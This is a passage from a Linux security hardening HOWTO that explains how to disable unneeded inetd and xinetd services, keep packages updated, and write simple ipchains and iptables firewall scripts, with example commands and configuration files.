|# Version: @(#)/etc/inetd.conf 3.10 05/27/93 |
|# |
|# Authors: Original taken from BSD UNIX 4.3/TAHOE. |
|# Fred N. van Kempen, <waltje@uwalt.nl.mugnet.org> |
|# |
|# Modified for Debian Linux by Ian A. Murdock <imurdock@shell.portal.com> |
|# |
|# Echo, discard, daytime, and chargen are used primarily for testing. |
|# |
|# To re-read this file after changes, just do a 'killall -HUP inetd' |
|# |
|#echo stream tcp nowait root internal |
|#echo dgram udp wait root internal |
|#discard stream tcp nowait root internal |
|#discard dgram udp wait root internal |
|#daytime stream tcp nowait root internal |
|#daytime dgram udp wait root internal |
|#chargen stream tcp nowait root internal |
|#chargen dgram udp wait root internal |
|time stream tcp nowait root internal |
|# |
|# These are standard services. |
|# |
|#ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a |
|#telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd |
|# |
|# Shell, login, exec, comsat and talk are BSD protocols. |
|# |
|#shell stream tcp nowait root /usr/sbin/tcpd in.rshd |
|#login stream tcp nowait root /usr/sbin/tcpd in.rlogind |
|#exec stream tcp nowait root /usr/sbin/tcpd in.rexecd |
|#comsat dgram udp wait root /usr/sbin/tcpd in.comsat |
|#talk dgram udp wait root /usr/sbin/tcpd in.talkd |
|#ntalk dgram udp wait root /usr/sbin/tcpd in.ntalkd |
|#dtalk stream tcp wait nobody /usr/sbin/tcpd in.dtalkd |
|# |
|# Pop and imap mail services et al |
|# |
|#pop-2 stream tcp nowait root /usr/sbin/tcpd ipop2d |
|pop-3 stream tcp nowait root /usr/sbin/tcpd ipop3d |
|#imap stream tcp nowait root /usr/sbin/tcpd imapd |
|# |
|# The Internet UUCP service. |
|# |
|#uucp stream tcp nowait uucp /usr/sbin/tcpd /usr/lib/uucp/uucico -l |
|# |
| |
|<snip> |
| |
| |
+---------------------------------------------------------------------------+
The above example has two services enabled: time and pop3. To disable these,
all we need is to open the file with a text editor, comment out the two
services with a "#", save the file, and then restart inetd (as root):
+---------------------------------------------------------------------------+
| |
| # /etc/rc.d/init.d/inetd restart |
| |
| |
+---------------------------------------------------------------------------+
Check your logs for errors, and run netstat again to verify all went well.
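The same edit can be scripted with sed rather than a text editor. A sketch against a scratch copy (the file name and entries here are fabricated for the demonstration; always work on a copy and inspect the result before touching the real /etc/inetd.conf):

```shell
# A two-line scratch file standing in for /etc/inetd.conf -- do a dry
# run like this before editing the real file.
conf=/tmp/inetd.conf.test
printf 'time\tstream\ttcp\tnowait\troot\tinternal\n' >  "$conf"
printf 'pop-3\tstream\ttcp\tnowait\troot\t/usr/sbin/tcpd\tipop3d\n' >> "$conf"

# Prefix both active entries with "#" to disable them (GNU sed; the
# .bak suffix keeps a backup copy of the original).
sed -i.bak -e 's/^time\b/#time/' -e 's/^pop-3\b/#pop-3/' "$conf"

# With every line commented out, nothing should remain enabled.
grep -v '^#' "$conf" || echo "no inetd services enabled"
```

On the real file you would then restart inetd, as shown above, and check netstat again.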
A quicker way of getting the same information, using grep:
+---------------------------------------------------------------------------+
| $ grep -v '^#' /etc/inetd.conf |
| time stream tcp nowait root internal |
| pop-3 stream tcp nowait root /usr/sbin/tcpd ipop3d |
| |
| |
+---------------------------------------------------------------------------+
Again, do you see anything there that you don't recognize? Then in all
likelihood you are not using it, and it should be disabled.
Unlike the init services configuration, this is a lasting change, so only
one step is required.
Let's dispel one myth that gets tossed around: you should not disable a
service by commenting out, or removing, entries from /etc/services. This may
have the desired effect in some cases, but is not the right way to do it, and
may interfere with the normal operation of other system utilities.
-----------------------------------------------------------------------------
3.3.3. Xinetd
xinetd is an inetd replacement with enhancements. Red Hat includes xinetd
with 7.0 and later releases. It essentially serves the same purpose as inetd,
but the configuration is different. The configuration can be in the file
/etc/xinetd.conf, or individual files in the directory /etc/xinetd.d/.
Configuration of individual services will be in the individual files under
/etc/xinetd.d/*. Turning off xinetd services is done by either deleting the
corresponding configuration section, or file. Or by using your text editor
and simply setting disable = yes for the appropriate service. Or by using
chkconfig. Then, xinetd will need to be restarted. See man xinetd and man
xinetd.conf for syntax and configuration options. A sample xinetd
configuration:
+---------------------------------------------------------------------------+
| # default: on |
| # description: The wu-ftpd FTP server serves FTP connections. It uses \ |
| # normal, unencrypted usernames and passwords for authentication. |
| service ftp |
| { |
| disable = no |
| socket_type = stream |
| wait = no |
| user = root |
| server = /usr/sbin/in.ftpd |
| server_args = -l -a |
| log_on_success += DURATION USERID |
| log_on_failure += USERID |
| nice = 10 |
| } |
| |
| |
+---------------------------------------------------------------------------+
You can get a quick list of enabled services:
+---------------------------------------------------------------------------+
| $ grep disable /etc/xinetd.d/* |grep no |
| /etc/xinetd.d/finger: disable = no |
| /etc/xinetd.d/rexec: disable = no |
| /etc/xinetd.d/rlogin: disable = no |
| /etc/xinetd.d/rsh: disable = no |
| /etc/xinetd.d/telnet: disable = no |
| /etc/xinetd.d/wu-ftpd: disable = no |
| |
| |
+---------------------------------------------------------------------------+
At this point, the above output should raise some red flags. In the
overwhelming majority of systems, all the above can be disabled without any
adverse impact. Not sure? Try it without that service. After disabling
unnecessary services, then restart xinetd:
+---------------------------------------------------------------------------+
| |
| # /etc/rc.d/init.d/xinetd restart |
| |
| |
+---------------------------------------------------------------------------+
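Setting disable = yes can likewise be scripted. A sketch against a scratch service file (the content is fabricated; on a real system you would point sed at the appropriate file under /etc/xinetd.d/ and then restart xinetd as shown above):

```shell
# A scratch service file standing in for one under /etc/xinetd.d/
# (fabricated content, for demonstration only).
f=$(mktemp)
printf 'service telnet\n{\n\tdisable = no\n\tsocket_type = stream\n}\n' > "$f"

# Rewrite the disable flag from "no" to "yes", tolerating whitespace
# variations around the "=" sign.
sed -i 's/disable[[:space:]]*=[[:space:]]*no/disable = yes/' "$f"

grep 'disable' "$f"    # the line should now read: disable = yes
```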
-----------------------------------------------------------------------------
3.3.4. When All Else Fails
OK, if you can't find the "right" way to stop a service, or maybe a service
is being started and you can't find how or where, you can "kill" the process.
To do this, you will need to know the PID (Process I.D.). This can be found
with ps, top, fuser or other system utilities. For top and ps, this will be
the number in the first column. See the Port and Process Owner section in the
Appendix for examples.
Example (as root):
+---------------------------------------------------------------------------+
| # kill 1163 |
| |
| |
+---------------------------------------------------------------------------+
Then run top or ps again to verify that the process is gone. If not, then:
+---------------------------------------------------------------------------+
| # kill -KILL 1163 |
| |
| |
+---------------------------------------------------------------------------+
Note the second "KILL" in there. This must be done either by the user who
owns the process, or root. Now go find where and how this process got started
;-)
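The escalation from a polite kill to kill -KILL can be scripted. A sketch using a harmless sleep process as a stand-in victim; kill -0 sends no signal at all and is the standard way to test whether a PID still exists:

```shell
# A long-running stand-in for the mystery process.
sleep 300 &
pid=$!

kill "$pid"                   # polite SIGTERM first
wait "$pid" 2>/dev/null || true   # reap it so the PID really disappears

# kill -0 delivers nothing; it only tests whether the PID still exists.
if kill -0 "$pid" 2>/dev/null; then
    kill -KILL "$pid"         # escalate only if SIGTERM was ignored
    echo "had to use SIGKILL on $pid"
else
    echo "process $pid is gone"
fi
```

Well-behaved daemons exit on SIGTERM; SIGKILL gives them no chance to clean up, so it should stay the last resort.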
The /proc filesystem can also be used to find out more information about each
process. Armed with the PID, we can find the path to a mysterious process:
+---------------------------------------------------------------------------+
| $ /bin/ps ax|grep tcpgate |
| 921 ? S 0:00 tcpgate |
| |
| |
+---------------------------------------------------------------------------+
+----------------------------------------------------------------------------------+
| # ls -l /proc/921/exe |
| lrwxrwxrwx 1 root root 0 July 21 12:11 /proc/921/exe -> /usr/local/bin/tcpgate |
| |
| |
+----------------------------------------------------------------------------------+
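You can try the /proc technique safely on any process you own. A sketch that inspects the current shell itself ($$ expands to the shell's own PID):

```shell
# Every process has a /proc/<PID>/ directory; $$ is this shell's own PID.
pid=$$

# "exe" is a symlink pointing at the binary behind the process.
readlink "/proc/$pid/exe"

# "cmdline" holds the full command line, NUL-separated; translate the
# NULs to spaces to make it readable.
tr '\0' ' ' < "/proc/$pid/cmdline"; echo
```

Substitute the PID of the mystery process for $$ and the same two files tell you what binary it is and how it was invoked.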
-----------------------------------------------------------------------------
3.4. Exceptions
Above we used the criteria of turning off all unnecessary services. Sometimes
that is not so obvious. And sometimes what may be required for one person's
configuration is not the same for another's. Let's look at a few common
services that fall in this category.
Again, our rule of thumb is if we don't need it, we won't run it. It's that
simple. If we do need any of these, they are prime candidates for some kind
of restrictive policies via firewall rules or other mechanisms (see below).
  * identd - This is a protocol that has been around for ages, and is often
    installed and running by default. It is used to provide a minimal amount
    of information about who is connecting to a server. But it is not
    necessary in many cases. Where might you need it? Most IRC servers
    require it. Many mail servers use it, but don't really require it. Try
    your mail setup without it. If identd is going to be a problem, it will
    be because there is a time out before the server starts sending or
    receiving mail. So mail should work fine without it, but may be slower. A
    few ftp servers may require it. Most don't though. Older versions of Red
    Hat started identd via inetd. Recent versions start this via init
    scripts.
If identd is required, there are some configuration options that can
greatly reduce the information that is revealed:
+---------------------------------------------------------------+
| |
| /usr/sbin/in.identd in.identd -l -e -o -n -N |
| |
| |
+---------------------------------------------------------------+
The -o flag tells identd to not reveal the operating system type it is
run on and to instead always return "OTHER". The -e flag tells identd to
always return "UNKNOWN-ERROR" instead of the "NO-USER" or "INVALID-PORT"
errors. The -n flag tells identd to always return user numbers instead of
user names, if you wish to keep the user names a secret. The -N flag
makes identd check for the file .noident in the home directory of the user
for which the daemon is about to return a user name. If that file exists,
the daemon will give the error "HIDDEN-USER" instead of the normal
"USERID" response.
  * Mail server (MTA's like sendmail, qmail, etc) - Often a fully functional
    mail server like sendmail is installed by default. The only time that
    this is actually required is if you are hosting a domain, and receiving
    incoming mail directly. Or possibly, for exchanging mail on a LAN, in
    which case it does not need Internet exposure and can be safely
    firewalled. For your ISP's POP mail access, you don't need it even though
    this is a common configuration. One alternative here is to use fetchmail
    for POP mail retrieval with the -m option to specify a local delivery
    agent: fetchmail -m procmail for instance works with no sendmail daemon
    running at all. Sendmail can be handy to have running, but the point is,
    it is not required in many situations, and can be disabled, or firewalled
    safely.
  * BIND (named) - This often is installed by default, but is only really
    needed if you are an authoritative name server for a domain. If you are
    not sure what this means, then you definitely don't need it. BIND is
    often used, though, in a "caching" only mode. This can be quite useful,
    but does not require full exposure to the Internet. BIND is probably the
    number one crack target on the Internet. In other words, it should be
    restricted or firewalled. See special handling of individual applications
    below.
-----------------------------------------------------------------------------
3.5. Summary and Conclusions for Step 1
In this section we learned how to identify which services are running on our
system, and were given some tips on how to determine which services may be
necessary. Then we learned how to find where the services were being started,
and how to stop them. If this has not made sense, now is a good time to
re-read the above.
Hopefully you've already taken the above steps. Be sure to test your results
with netstat again, just to verify the desired end has been achieved, and
only the services that are really required are running.
It would also be wise to do this after the next reboot, anytime you upgrade a
package (to make sure a new configuration does not sneak in), and after every
system upgrade or new install.
-----------------------------------------------------------------------------
4. Step 2: Updating
OK, this section should be comparatively short, simple and straightforward
compared to the above, but no less important.
The very first thing you should do after a new install is check the errata
notices at [http://redhat.com/errata/] http://redhat.com/apps/errata/, and
apply all relevant updates. Only a year old, you say? That's a long time
actually, and not current enough to be safe. Only a few months or weeks?
Check anyway.
A day or two? Better safe than sorry. It is quite possible that security
updates have been released during the pre-release phase of the development
and release cycle. If you can't take this step, disable any publicly
accessible services until you can.
Linux distributions are not static entities. They are updated with new,
patched packages as the need arises. The updates are just as important as the
original installation. Even more so, since they are fixes. Sometimes these
updates are bug fixes, but quite often they are security fixes because some
hole has been discovered. Such "holes" are immediately known to the cracker
community, and they are quick to exploit them on a large scale. Once the hole
is known, it is quite simple to get in through it, and there will be many out
there looking for it. And Linux developers are also equally quick to provide
fixes. Sometimes the same day as the hole has become known!
Keeping all installed packages current with your release is one of the most
important steps you can take in maintaining a secure system. It cannot be
emphasized enough that all installed packages should be kept updated -- not
just the ones you use. If this is burdensome, consider uninstalling any
unused packages. Actually this is a good idea anyway.
But where to get this information in a timely fashion? There are a number of
web sites that offer the latest security news. There are also a number of
mailing lists dedicated to this topic. In fact, Red Hat has the "watch" list,
just for this purpose at [https://listman.redhat.com/mailman/listinfo/
redhat-watch-list] https://listman.redhat.com/mailman/listinfo/
redhat-watch-list. This is a very low volume list by the way. This is an
excellent way to stay abreast of issues affecting your release, and is highly
recommended. [http://linuxsecurity.com] http://linuxsecurity.com is a good
site for Linux only issues. They also have weekly newsletters available:
[http://www.linuxsecurity.com/general/newsletter.html] http://
www.linuxsecurity.com/general/newsletter.html.
Red Hat also has the up2date utility for automatically keeping your system(s)
up to date ;-). See the man page for details.
This is not a one time process -- it is ongoing. It is important to stay
current. So watch those security notices. And subscribe to that security
mailing list today! If you have cable modem, DSL, or other full time
connection, there is no excuse not to do this religiously. All distributions
make this easy enough!
One last note: any time a new package is installed, there is also a chance
that a new or revised configuration has been installed as well. Which means
that if this package is a server of some kind, it may be enabled as a result
of the update. This is bad manners, but it can happen, so be sure to run
netstat or comparable to verify your system is where you want it after any
updates or system changes. In fact, do it periodically even if there are no
such changes.
-----------------------------------------------------------------------------
4.1. Summary and Conclusions for Step 2
It is very simple: make sure your Linux installation is current. Check the
Red Hat errata for what updated packages may be available. There is nothing
wrong with running an older release, as long as the packages in it are updated
according to what Red Hat has made available since the initial release. At
least as long as Red Hat is still supporting the release and updates are
still being provided. For instance, Red Hat has stopped providing updates for
5.0 and 5.1, but still does for 5.2.
-----------------------------------------------------------------------------
5. Step 3: Firewalls and Setting Access Policies
So what is a "firewall"? It's a vague term that can mean anything that acts
as a protective barrier between us and the outside world. This can be a
dedicated system, or a specific application that provides this functionality.
Or it can be a combination of components, including various combinations of
hardware and software. Firewalls are built from "rules" that are used to
define what is allowed to enter and exit a given system or network. Let's
look at some of the possible components that are readily available for Linux,
and how we might implement a reasonably safe firewalling strategy.
In Step 1 above, we have turned off all services we don't need. In our
example, there were a few we still needed to have running. In this section,
we will take the next step here and decide which we need to leave open to the
world. And which we might be able to restrict in some way. If we can block
them all, so much the better, but this is not always practical.
-----------------------------------------------------------------------------
5.1. Strategy
What we want to do now is restrict connections and traffic so that we only
allow the minimum necessary for whatever our particular situation is. In some
cases we may want to block all incoming "new" connection attempts. Example:
we want to run X, but don't want anyone from outside to access it, so we'll
block it completely from outside connections. In other situations, we may
want to limit, or restrict, incoming connections to trusted sources only. The
more restrictive, the better. Example: we want to ssh into our system from
outside, but we only ever do this from our workplace. So we'll limit sshd
connections to our workplace address range. There are various ways to do
this, and we'll look at the most common ones.
We also will not want to limit our firewall to any one application. There is
nothing wrong with a "layered" defense-in-depth approach. Our front line
protection will be a packet filter -- either ipchains or iptables (see
below). Then we can use additional tools and mechanisms to reinforce our
firewall.
We will include some brief examples. Our rule of thumb will be to deny
everything as the default policy, then open up just what we need. We'll try
to keep this as simple as possible since it can be an involved and complex
topic, and just stick to some of the most basic concepts. See the Links
section for further reading on this topic.
-----------------------------------------------------------------------------
5.2. Packet Filters -- Ipchains and Iptables
"Packet filters" (like ipchains) have the ability to look at individual
packets, and make decisions based on what they find. These can be used for
many purposes. One common purpose is to implement a firewall.
Common packet filters on Linux are ipchains which is standard with 2.2
kernels, and iptables which is available with the more recent 2.4 kernels.
iptables has more advanced packet filtering capabilities and is recommended
for anyone running a 2.4 kernel. But either can be effective for our
purposes. ipfwadm is a similar utility for 2.0 kernels (not discussed here).
If constructing your own ipchains or iptables firewall rules seems a bit
daunting, there are various sites that can automate the process. See the
Links section. Also the included examples may be used as a starting point. As
of Red Hat 7.1, Red Hat is providing init scripts for ipchains and iptables,
and gnome-lokkit for generating a very basic set of firewall rules (see below
). This may be adequate, but it is still recommended to know the proper
syntax and how the various mechanisms work, as such tools rarely generate
more than a few very simple rules.
Note Various examples are given below. These are presented for illustrative
purposes to demonstrate some of the concepts being discussed here. While
they might also be useful as a starting point for your own script,
please note that they are not meant to be all encompassing. You are
strongly encouraged to understand how the scripts work, so you can
create something even more tailored for your own situation.
The example scripts are just protecting inbound connections to one
interface (the one connected to the Internet). This may be adequate for
many simple home situations, but this approach is not adequate for all
situations!
-----------------------------------------------------------------------------
5.2.1. ipchains
ipchains can be used with either 2.2 or 2.4 kernels. When ipchains is in
place, it checks every packet that moves through the system. The packets move
across different "chains", depending on where they originate and where they are
going. Think of "chains" as rule sets. In advanced configurations, we could
define our own custom chains. The three default built-in chains are input,
which is incoming traffic, output, which is outgoing traffic, and forward,
which is traffic being forwarded from one interface to another (typically
used for "masquerading"). Chains can be manipulated in various ways to
control the flow of traffic in and out of our system. Rules can be added at
our discretion to achieve the desired result.
At the end of every "chain" is a "target". The target is specified with the
-j option to the command. The target is what decides the fate of the packet
and essentially terminates that particular chain. The most common targets are
mostly self-explanatory: ACCEPT, DENY, REJECT, and MASQ. MASQ is for
"ipmasquerading". DENY and REJECT essentially do the same thing, though in
different ways. Is one better than the other? That is the subject of much
debate, and depends on other factors that are beyond the scope of this
document. For our purposes, either should suffice.
ipchains has a very flexible configuration. Ports (or port ranges),
interfaces, destination addresses, and source addresses can be specified, as well as
various other options. The man page explains these details well enough that
we won't get into specifics here.
Traffic entering our system from the Internet, enters via the input chain.
This is the one that we need as tight as we can make it.
Below is a brief example script for a hypothetical system. We'll let the
comments explain what this script does. Anything starting with a "#" is a
comment. ipchains rules are generally incorporated into shell scripts, using
shell variables to help implement the firewalling logic.
#!/bin/sh
#
# ipchains.sh
#
# An example of a simple ipchains configuration.
#
# This script allows ALL outbound traffic, and denies
# ALL inbound connection attempts from the outside.
#
###################################################################
# Begin variable declarations and user configuration options ######
#
IPCHAINS=/sbin/ipchains
# This is the WAN interface, that is our link to the outside world.
# For pppd and pppoe users.
# WAN_IFACE="ppp0"
WAN_IFACE="eth0"
## end user configuration options #################################
###################################################################
# The high ports used mostly for connections we initiate and return
# traffic.
LOCAL_PORTS=`cat /proc/sys/net/ipv4/ip_local_port_range |cut -f1`:\
`cat /proc/sys/net/ipv4/ip_local_port_range |cut -f2`
# Any and all addresses from anywhere.
ANYWHERE="0/0"
# Let's start clean and flush all chains to an empty state.
$IPCHAINS -F
# Set the default policies of the built-in chains. If no match for any
# of the rules below, these will be the defaults that ipchains uses.
$IPCHAINS -P forward DENY
$IPCHAINS -P output ACCEPT
$IPCHAINS -P input DENY
# Accept localhost/loopback traffic.
$IPCHAINS -A input -i lo -j ACCEPT
# Get our dynamic IP now from the Inet interface. WAN_IP will be our
# IP address we are protecting from the outside world. Put this
# here, so default policy gets set, even if interface is not up
# yet.
WAN_IP=`ifconfig $WAN_IFACE |grep inet |cut -d : -f 2 |cut -d \ -f 1`
# Bail out with error message if no IP available! Default policy is
# already set, so all is not lost here.
[ -z "$WAN_IP" ] && echo "$WAN_IFACE not configured, aborting." && exit 1
# Accept non-SYN TCP, and UDP connections to LOCAL_PORTS. These are
# the high, unprivileged ports (1024 to 4999 by default). This will
# allow return connection traffic for connections that we initiate
# to outside sources. TCP connections are opened with 'SYN' packets.
$IPCHAINS -A input -p tcp -s $ANYWHERE -d $WAN_IP $LOCAL_PORTS ! -y -j ACCEPT
# We can't be so selective with UDP since that protocol does not
# know about SYNs.
$IPCHAINS -A input -p udp -s $ANYWHERE -d $WAN_IP $LOCAL_PORTS -j ACCEPT
## ICMP (ping)
#
# ICMP rules, allow the bare essential types of ICMP only. Ping
# request is blocked, ie we won't respond to someone else's pings,
# but can still ping out.
$IPCHAINS -A input -p icmp --icmp-type echo-reply \
-s $ANYWHERE -i $WAN_IFACE -j ACCEPT
$IPCHAINS -A input -p icmp --icmp-type destination-unreachable \
-s $ANYWHERE -i $WAN_IFACE -j ACCEPT
$IPCHAINS -A input -p icmp --icmp-type time-exceeded \
-s $ANYWHERE -i $WAN_IFACE -j ACCEPT
###################################################################
# Set the catchall, default rule to DENY, and log it all. All other
# traffic not allowed by the rules above, winds up here, where it is
# blocked and logged. This is the default policy for this chain
# anyway, so we are just adding the logging ability here with '-l'.
# Outgoing traffic is allowed as the default policy for the 'output'
# chain. There are no restrictions on that.
$IPCHAINS -A input -l -j DENY
echo "Ipchains firewall is up `date`."
##-- eof ipchains.sh
To use the above script, it must be executable (i.e. chmod +x
ipchains.sh), and be run by root to build the chains, and hence the firewall.
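The two command substitutions in the script deserve a closer look. Below is a
small sketch (not part of the original script) that runs the same cut
pipelines on sample data, so you can see what they extract without reading
/proc or querying a live interface. The port range and IP address used here
are hypothetical stand-ins:

```shell
#!/bin/sh
# Sketch of the ipchains.sh parsing pipelines, run on sample data.

# /proc/sys/net/ipv4/ip_local_port_range holds two tab-separated numbers;
# cut pulls each field, and they are joined with ":" into a port range.
range_file=`printf '1024\t4999'`        # sample contents of the /proc file
LOCAL_PORTS=`echo "$range_file" | cut -f1`:`echo "$range_file" | cut -f2`
echo "LOCAL_PORTS=$LOCAL_PORTS"

# One line of classic ifconfig output; cutting on ":" and then on " "
# isolates the interface's IP address.
inet_line="          inet addr:192.0.2.1  Bcast:192.0.2.255  Mask:255.255.255.0"
WAN_IP=`echo "$inet_line" | grep inet | cut -d : -f 2 | cut -d ' ' -f 1`
echo "WAN_IP=$WAN_IP"
```

Running this prints the derived LOCAL_PORTS range and WAN_IP address, which
is exactly what the firewall script computes before building its rules.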
To summarize, this example starts by setting some shell variables in the top
section, to be used later in the script. Then we set the default rules
(ipchains calls these "policies") of denying all inbound and forwarded
traffic, and of allowing all our own outbound traffic. We had to open some
holes in the high, unprivileged ports so that we could have return traffic
from connections that bigcat initiates to outside addresses. If we connect to
someone's web server, we want that HTML data to be able to get back to us,
for instance. The same applies to other network traffic. We then allowed a
few specific types of the ICMP protocol (most are still blocked). We are also
logging any inbound traffic that violates any of our rules so we know who is
doing what. Notice that we are only using IP addresses here, not hostnames of
any kind. This is so that our firewall works even in situations where there
may be DNS failures, and to prevent any kind of DNS spoofing.
See the ipchains man page for a full explanation of syntax. The important
ones we used here are:
  * -A input: Adds a rule to the "input" chain. The default chains are
    input, output, and forward.
  * -p udp: This rule only applies to the "UDP" "protocol". The -p option
    can be used with tcp, udp or icmp protocols.
  * -i $WAN_IFACE: This rule applies to the specified interface only, and
    applies to whatever chain is referenced (input, output, or forward).
  * -s <IP address> [port]: This rule only applies to the source address as
    specified. It can optionally have a port (e.g. 22) immediately afterward,
    or port range, e.g. 1023:4999.
  * -d <IP address> [port]: This rule only applies to the destination
    address as specified. Also, it may include port or port range.
  * -l : Any packet that hits a rule with this option is logged (lower case
    "L").
  * -j ACCEPT: Jumps to the "ACCEPT" "target". This effectively terminates
    this chain and decides the ultimate fate for this particular packet,
    which in this example is to "ACCEPT" it. The same is true for other -j
    targets like DENY.
By and large, the order in which command line options are specified is not
significant. The chain name (e.g. input) must come first though.
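To see how these options fit together, here is a sketch of one complete rule
that would allow ssh from a single trusted host. The addresses are
placeholders, and ipchains is replaced with echo so the rule is printed for
inspection rather than executed (applying it for real requires root and an
ipchains-capable kernel):

```shell
#!/bin/sh
# Sketch: combining the options above into one rule. IPCHAINS is set to
# echo so the final command line prints rather than runs; substitute
# /sbin/ipchains (as root) to apply it. Addresses are hypothetical.
IPCHAINS="echo /sbin/ipchains"
WAN_IP="192.0.2.1"        # placeholder address of our external interface
TRUSTED="198.51.100.7"    # placeholder host allowed to reach sshd

# Allow inbound tcp to port 22 (ssh) on our address, from TRUSTED only:
$IPCHAINS -A input -p tcp -s $TRUSTED -d $WAN_IP 22 -j ACCEPT
```

Note that the chain name comes first, followed by the protocol, source,
destination with port, and finally the -j target that seals the packet's fate.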
Remember in Step 1 when we ran netstat, we had both X and print servers
running among other things. We don't want these exposed to the Internet, even
in a limited way. These are still happily running on bigcat, but are now safe
and sound behind our ipchains based firewall. You probably have other
services that fall in this category as well.
The above example is a simplistic all or none approach. We allow all our own
outbound traffic (not necessarily a good idea), and block all inbound
connection attempts from outside. It is only protecting one interface, and
really just the inbound side of that interface. It would more than likely
require a bit of fine tuning to make it work for you. For a more advanced set
of rules, see the Appendix. And you might want to read [http://tldp.org/HOWTO
/IPCHAINS-HOWTO.html] http://tldp.org/HOWTO/IPCHAINS-HOWTO.html.
Whenever you have made changes to your firewall, you should verify its
integrity. One way to make sure your rules are doing what you intended is to
see how ipchains has interpreted your script. You can do this by opening
your xterm very wide, and issuing the following command:
+---------------------------------------------------------------------------+
| # ipchains -L -n -v | less |
| |
| |
+---------------------------------------------------------------------------+
The output is grouped according to chain. You should also find a way to scan
yourself (see the Verifying section below). And then keep an eye on your logs
to make sure you are blocking what is intended.
-----------------------------------------------------------------------------
5.2.2. iptables
iptables is the next generation packet filter for Linux, and requires a 2.4
kernel. It can do everything ipchains can, but has a number of noteworthy
enhancements. The syntax is similar to ipchains in many respects. See the man
page for details.
The most noteworthy enhancement is "connection tracking", also known as
"stateful inspection". This gives iptables more knowledge of the state of
each packet. Not only does it know if the packet is a TCP or UDP packet, or
whether it has the SYN or ACK flags set, but also if it is part of an
existing connection, or related somehow to an existing connection. The
implications for firewalling should be obvious.
The bottom line is that it is easier to get a tight firewall with iptables,
than with ipchains. So this is the recommended way to go.
Here is the same script as above, revised for iptables:
#!/bin/sh
#
# iptables.sh
#
# An example of a simple iptables configuration.
#
# This script allows ALL outbound traffic, and denies
# ALL inbound connection attempts from the Internet interface only.
#
###################################################################
# Begin variable declarations and user configuration options ######
#
IPTABLES=/sbin/iptables
# Local Interfaces
# This is the WAN interface that is our link to the outside world.
# For pppd and pppoe users.
# WAN_IFACE="ppp0"
WAN_IFACE="eth0"
#
## end user configuration options #################################
###################################################################
# Any and all addresses from anywhere.
ANYWHERE="0/0"
# This module may need to be loaded:
modprobe ip_conntrack_ftp
# Start building chains and rules #################################
#
# Let's start clean and flush all chains to an empty state.
$IPTABLES -F
# Set the default policies of the built-in chains. If no match for any
# of the rules below, these will be the defaults that IPTABLES uses.
$IPTABLES -P FORWARD DROP
$IPTABLES -P OUTPUT ACCEPT
$IPTABLES -P INPUT DROP
# Accept localhost/loopback traffic.
$IPTABLES -A INPUT -i lo -j ACCEPT
## ICMP (ping)
#
# ICMP rules, allow the bare essential types of ICMP only. Ping
# request is blocked, ie we won't respond to someone else's pings,
# but can still ping out.
$IPTABLES -A INPUT -p icmp --icmp-type echo-reply \
-s $ANYWHERE -i $WAN_IFACE -j ACCEPT
$IPTABLES -A INPUT -p icmp --icmp-type destination-unreachable \
-s $ANYWHERE -i $WAN_IFACE -j ACCEPT
$IPTABLES -A INPUT -p icmp --icmp-type time-exceeded \
-s $ANYWHERE -i $WAN_IFACE -j ACCEPT
###################################################################
# Set the catchall, default rule to DENY, and log it all. All other
# traffic not allowed by the rules above, winds up here, where it is
# blocked and logged. This is the default policy for this chain
# anyway, so we are just adding the logging ability here with '-j
# LOG'. Outgoing traffic is allowed as the default policy for the
# 'output' chain. There are no restrictions on that.
$IPTABLES -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
$IPTABLES -A INPUT -m state --state NEW -i ! $WAN_IFACE -j ACCEPT
$IPTABLES -A INPUT -j LOG -m limit --limit 30/minute --log-prefix "Dropping: "
echo "Iptables firewall is up `date`."
##-- eof iptables.sh
The same script logic is used here, and thus this does pretty much the same
thing as the ipchains script in the previous section. There are some subtle
differences in syntax. Note, for one, the case difference in the chain names
(e.g. INPUT vs input). Logging is handled differently too. It has its own
"target" now (-j LOG), and is much more flexible.
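As a quick illustration, entries produced by the script's LOG rule can be
pulled out of the system log by the "Dropping: " prefix it sets. The sample
log line below is fabricated, since the exact fields vary by kernel and
traffic; on a live system you would search /var/log/messages instead:

```shell
#!/bin/sh
# Sketch: finding the firewall's log entries by the "Dropping: " prefix
# set in the iptables script above. The sample line is fabricated.
sample='Jun  1 12:00:00 bigcat kernel: Dropping: IN=eth0 OUT= SRC=203.0.113.9 DST=192.0.2.1 PROTO=TCP DPT=111'
echo "$sample" | grep -c 'Dropping: '
# On a real system:  grep 'Dropping: ' /var/log/messages | tail
```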
There are some very fundamental differences as well, that might not be so
obvious. Remember this section from the ipchains script:
# Accept non-SYN TCP, and UDP connections to LOCAL_PORTS. These are the high,
# unprivileged ports (1024 to 4999 by default). This will allow return
# connection traffic for connections that we initiate to outside sources.
# TCP connections are opened with 'SYN' packets. We have already opened
# those services that need to accept SYNs, so all other SYNs are excluded
# here.
$IPCHAINS -A input -p tcp -s $ANYWHERE -d $WAN_IP $LOCAL_PORTS ! -y -j ACCEPT
# We can't be so selective with UDP since that protocol does not know
# about SYNs.
$IPCHAINS -A input -p udp -s $ANYWHERE -d $WAN_IP $LOCAL_PORTS -j ACCEPT
We jumped through hoops here with ipchains so that we could restrict
unwanted, incoming connections as much as possible. A bit of a kludge,
actually.
That section is missing from the iptables version. It is not needed as
connection tracking handles this quite nicely, and then some. This is due to
the "statefulness" of iptables. It knows more about each packet than
ipchains. For instance, it knows whether the packet is part of a "new" connection, or
an "established" connection, or a "related" connection. This is the so-called
"stateful inspection" of connection tracking.
There are many, many features of iptables that are not touched on here. For
more reading on the Netfilter project and iptables, see [http://
netfilter.samba.org] http://netfilter.samba.org. And for a more advanced set
of rules, see the Appendix.
-----------------------------------------------------------------------------
5.2.3. Red Hat Firewall Configuration Tools
Red Hat did not include firewall configuration tools until 7.1, when the GUI
utility gnome-lokkit started being bundled. gnome-lokkit generates a
minimalist set of rules for ipchains only. Explicit support for iptables
configuration is not an option, despite the fact that the default kernel is 2.4.
gnome-lokkit is an option on non-upgrade installs, and can also be run as a
stand-alone app any time after installation. It will ask a few simple
questions, and dump the resulting rule-set into /etc/sysconfig/ipchains.
As mentioned, this is a fairly minimalist set of rules, and possibly a
sufficient starting point. An example /etc/sysconfig/ipchains created by
gnome-lokkit:
# Firewall configuration written by lokkit
# Manual customization of this file is not recommended.
# Note: ifup-post will punch the current nameservers through the
# firewall; such entries will *not* be listed here.
:input ACCEPT
:forward ACCEPT
:output ACCEPT
-A input -s 0/0 -d 0/0 80 -p tcp -y -j ACCEPT
